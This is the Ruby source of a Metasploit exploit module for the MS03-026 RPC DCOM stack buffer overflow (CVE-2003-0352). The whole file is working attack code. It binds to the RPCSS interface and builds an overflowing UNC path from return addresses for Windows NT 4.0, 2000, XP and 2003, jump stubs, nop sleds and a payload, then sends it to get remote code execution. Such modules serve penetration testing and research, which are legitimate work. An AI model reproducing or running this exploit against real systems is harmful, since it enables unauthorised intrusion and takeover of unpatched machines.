Microsoft RPC DCOM Interface Overflow



##

# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking

    include Msf::Exploit::Remote::DCERPC

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft RPC DCOM Interface Overflow',
            'Description'    => %q{
                    This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
                was originally found by the Last Stage of Delirium research group and has been
                widely exploited ever since. This module can exploit the English versions of
                Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
            },
            'Author'         => [ 'hdm', 'spoonm', 'cazz' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11545 $',
            'References'     =>
                [
                    [ 'CVE', '2003-0352'  ],
                    [ 'OSVDB', '2100'     ],
                    [ 'MSB',   'MS03-026' ],
                    [ 'BID', '8205'       ],
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread'
                },
            'Payload'        =>
                {
                    'Space'    => 880,
                    'MinNops'  => 300,
                    'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
                    'StackAdjustment' => -3500
                },
            'Targets'        =>
                [
                    # Target 0: Universal
                    [
                        'Windows NT SP3-6a/2000/XP/2003 Universal',
                        {
                            'Platform' => 'win',
                            'Rets'     =>
                                [
                                    0x77f33723, # Windows NT 4.0 SP6a (esp)
                                    0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
                                    0x010016c6, # Windows 2000 Universal (ebx)
                                    0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
                                    0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls - thanks Litchfield!)
                                    0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
                                    0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
                                ],
                        },
                    ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Jul 16 2003'))
    end

    def autofilter
        # Common vulnerability scanning tools report port 445/139
        # due to how they test for the vulnerability. Remap this
        # back to 135 for automated exploitation

        rport = datastore['RPORT'].to_i
        if ( rport == 139 or rport == 445 )
            datastore['RPORT'] = 135
        end

        true
    end

    def exploit
        connect
        print_status("Trying target #{target.name}...")

        handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
        print_status("Binding to #{handle} ...")
        dcerpc_bind(handle)
        print_status("Bound to #{handle} ...")

        # Carefully create the combination of addresses and code for cross-os exploitation
        xpseh = rand_text_alphanumeric(360, payload_badchars)

        # Jump to [esp-4] - (distance to shellcode)
        jmpsc =
            "\x8b\x44\x24\xfc"      +         # mov eax,[esp-0x4]
            "\x05\xe0\xfa\xff\xff"  +         # add eax,0xfffffae0 (sub eax, 1312)
            Rex::Arch::X86.jmp_reg('eax')     # jmp eax

        # Jump to [ebp+0x30] - (distance to shellcode) - thanks again Litchfield!
        jmpsc2k3 =
            "\x8b\x45\x30"         +         # mov eax,[ebp+0x30]
            "\x05\x24\xfb\xff\xff" +         # add eax,0xfffffb24 (sub 1244)
            Rex::Arch::X86.jmp_reg('eax')     # jmp eax

        # Windows 2003 added by spoonm
        xpseh[ 246 - jmpsc2k3.length, jmpsc2k3.length ] = jmpsc2k3
        xpseh[ 246, 2 ] = Rex::Arch::X86.jmp_short("$-#{jmpsc2k3.length}")
        xpseh[ 250, 4 ] = [ target['Rets'][4] ].pack('V')

        xpseh[ 306, 2 ] = Rex::Arch::X86.jmp_short('$+8')
        xpseh[ 310, 4 ] = [ target['Rets'][3] ].pack('V')
        xpseh[ 314, jmpsc.length ] = jmpsc

        #
        # NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
        # NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
        # HD wrote NT 4.0 SP6a, and it's off in a different place
        #
        # Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
        # (hopefully I'm accurate, this is from my memory...)
        #
        # |---pop pop ret--------        --eax---|
        # V                     |        |       V
        # [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
        #     4             4           4              5               5
        #     |                                                 ^
        #     --------------------------------------------------|
        # The jmpback's all are 5 byte backwards jumps into our shellcode that
        # sits just below these overwrites...
        #

        nt4sp3jmp = Rex::Arch::X86.jmp_short("$+#{12 + 5}") +
            rand_text(2, payload_badchars)

        nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
        nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
        ntshiz =
            nt4sp3jmp +
            [ target['Rets'][6] ].pack('V') +
            [ target['Rets'][5] ].pack('V') +
            nt4sp5jmpback +
            nt4sp3jmpback

        # Pad to the magic value of 118 bytes
        ntshiz += rand_text(118 - ntshiz.length, payload_badchars)

        # Create the evil UNC path used in the overflow
        uncpath =
            Rex::Text.to_unicode("\\\\") +
            make_nops(32) +

            # When attacking NT 4.0, jump over 2000/XP return
            Rex::Arch::X86.jmp_short(16) +
            Rex::Arch::X86.jmp_short(25) +

            [ target['Rets'][2] ].pack('V') +   # Return address for 2000 (ebx)
            [ target['Rets'][0] ].pack('V') +   # Return address for NT 4.0 SP6 (esi)
            [ target['Rets'][1] ].pack('V') +   # Writable address on 2000 and jmp for NT 4.0
            make_nops(88) +
            Rex::Arch::X86.jmp_short(4) +
            rand_text(4, payload_badchars) +
            make_nops(8) +
            Rex::Arch::X86.jmp_short(4) +
            Rex::Arch::X86.jmp_short(4) +
            make_nops(4) +
            Rex::Arch::X86.jmp_short(4) +
            rand_text(4, payload_badchars) +
            payload.encoded +
            ntshiz +
            xpseh +
            Rex::Text.to_unicode("\\\x00")

        # This is the rpc cruft needed to trigger the vuln API
        stubdata =
            NDR.short(5) +
            NDR.short(1) +
            NDR.long(0) +
            NDR.long(0) +

            rand_text(16) +

            NDR.long(0) +
            NDR.long(0) +
            NDR.long(0) +
            NDR.long(0) +
            NDR.long(0) +

            NDR.long(rand(0xFFFFFFFF)) +

            NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +

            NDR.long(0) +
            NDR.long(rand(0xFFFFFFFF)) +
            NDR.long(rand(0xFFFFFFFF)) +

            NDR.long(1) +
            NDR.long(rand(0xFFFFFFFF)) +

            NDR.long(1) +
            NDR.long(rand(0xFFFFFFFF)) +
            NDR.long(rand(0xFFFFFFFF)) +
            NDR.long(rand(0xFFFFFFFF)) +
            NDR.long(rand(0xFFFFFFFF)) +

            NDR.long(1) +
            NDR.long(1) +
            NDR.long(rand(0xFFFFFFFF))

        print_status('Sending exploit ...')
        begin
            dcerpc_call(0, stubdata, nil, false)
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
        end

        handler
        disconnect
    end

end